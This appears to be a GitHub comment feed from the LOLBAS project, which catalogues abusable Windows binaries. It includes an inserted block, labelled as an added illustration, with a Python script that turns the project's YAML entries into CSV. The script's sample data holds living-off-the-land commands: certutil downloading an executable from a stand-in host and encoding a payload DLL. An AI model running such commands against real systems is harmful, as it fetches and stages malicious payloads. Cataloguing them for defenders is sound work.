Wietze
Hey @teixeira0xfffff, could you provide some more detail on how this would work? How would you specify the file that is to be uploaded? Or does it simply reach...
(also, this being an SDK executable, your entry should reside in the OtherMSBinaries folder)
For situational awareness: a couple of entries also have `SYSTEM` specified, especially some password dumpers.
The `msedge.exe` trick has been spotted in the wild: https://twitter.com/SBousseaden/status/1485283092008951815 Nice one @mrd0x - will properly review your entire PR soon.
#216 has added rdrleakdiag.exe, I'm closing this issue for now.
I believe this was fixed with #216, closing this issue for now.
A couple of executables listed above are now present in the project, e.g. `aspnet_compiler.exe`, `fsi.exe` and `fsiAnyCpu.exe`. (FYI, slightly unrelated but all blockrules executables that _ARE_ present in this project...
For the record, this was my approach: 1. Get a CSV with all commands that should be OS-native (i.e. everything except `OtherMSBinaries`).

```python
import csv, yaml,...
```
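The comment above describes the first step (collect every OS-native command into a CSV, skipping `OtherMSBinaries`) but the script itself is cut off. The block below is an added illustration of that step, not Wietze's script and not project code. It assumes the LOLBAS layout `yml/<Folder>/<Name>.yml` and the entry fields `Name` and `Commands[].Command/Category/Privileges`; the three entries in `SAMPLE_TREE` are constructed for the example. It also flags the `SYSTEM`-privilege entries mentioned earlier in the thread. To stay self-contained it uses a minimal parser for the flat subset of YAML these entries use; a real script would use PyYAML.

```python
"""Added example (not the thread author's script): walk a LOLBAS-style
yml tree, skip OtherMSBinaries, emit one CSV row per command, and list
the commands that declare Privileges: SYSTEM.

Assumptions (not stated on the page): repo layout yml/<Folder>/<Name>.yml
and the fields Name / Commands[].Command / Category / Privileges.
SAMPLE_TREE is constructed stand-in data, not real repository content."""
import csv
import io

# Constructed stand-in for a checkout: relative path -> file contents.
SAMPLE_TREE = {
    "yml/OSBinaries/Certutil.yml": """---
Name: Certutil.exe
Description: Windows binary used for handling certificates
Commands:
  - Command: certutil.exe -urlcache -split -f http://example.invalid/a.exe a.exe
    Description: Download and save a file
    Category: Download
    Privileges: User
  - Command: certutil.exe -encode payload.dll payload.txt
    Description: Encode a file as base64
    Category: Encode
    Privileges: User
Full_Path:
  - Path: C:\\Windows\\System32\\certutil.exe
""",
    "yml/OSBinaries/Sample.yml": """---
Name: Sample.exe
Commands:
  - Command: sample.exe /dump
    Description: Constructed entry for the example
    Category: Dump
    Privileges: SYSTEM
""",
    "yml/OtherMSBinaries/Other.yml": """---
Name: Other.exe
Commands:
  - Command: other.exe /x
    Category: Execute
    Privileges: User
""",
}

FIELDS = ["Folder", "Name", "Command", "Category", "Privileges"]


def parse_entry(text):
    """Minimal parser for the flat subset of YAML used by these entries:
    top-level 'Key: value' scalars plus a 'Commands:' list of '- Key: value'
    blocks. Other nested lists (e.g. Full_Path) are skipped. Not a general
    YAML parser; a production script should use PyYAML's safe_load."""
    entry = {"Commands": []}
    in_commands = False
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line or line == "---":
            continue
        indent = len(line) - len(line.lstrip())
        stripped = line.strip()
        if indent == 0:
            key, _, value = stripped.partition(":")
            in_commands = key == "Commands"
            if not in_commands:
                entry[key] = value.strip()
            continue
        if not in_commands:
            continue
        if stripped.startswith("- "):
            entry["Commands"].append({})  # start of a new command item
            stripped = stripped[2:]
        # Split on the first colon only: command strings contain URLs.
        key, _, value = stripped.partition(":")
        entry["Commands"][-1][key.strip()] = value.strip()
    return entry


def native_commands(tree, skip_dir="OtherMSBinaries"):
    """One row per command for every entry not under skip_dir."""
    rows = []
    for path in sorted(tree):
        folder = path.split("/")[-2]
        if folder == skip_dir:
            continue
        entry = parse_entry(tree[path])
        for cmd in entry["Commands"]:
            rows.append({
                "Folder": folder,
                "Name": entry.get("Name", ""),
                "Command": cmd.get("Command", ""),
                "Category": cmd.get("Category", ""),
                "Privileges": cmd.get("Privileges", ""),
            })
    return rows


def to_csv(rows):
    """Serialise the rows as CSV text with a header line."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS)
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


def system_only(rows):
    """Rows whose entry declares SYSTEM privileges."""
    return [r for r in rows if r["Privileges"].upper() == "SYSTEM"]


if __name__ == "__main__":
    rows = native_commands(SAMPLE_TREE)
    print(to_csv(rows))
    for r in system_only(rows):
        print("SYSTEM:", r["Name"], "->", r["Command"])
```

Pointing `SAMPLE_TREE` at a real checkout means replacing the dict with a walk over `yml/` that reads each file; the CSV and the `SYSTEM` filter stay the same.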
Couple of changes in b92ee99627d84fd17697e513960a3c423ff2dd34:
- Updated Msbuild w/ RSP entry to reflect masquerading aspect;
- Removed dead payload links from Mshta entries (linking to @bohops gist in code...
Updated this branch to be up to date with the `master` branch, ready for re-review/merging :)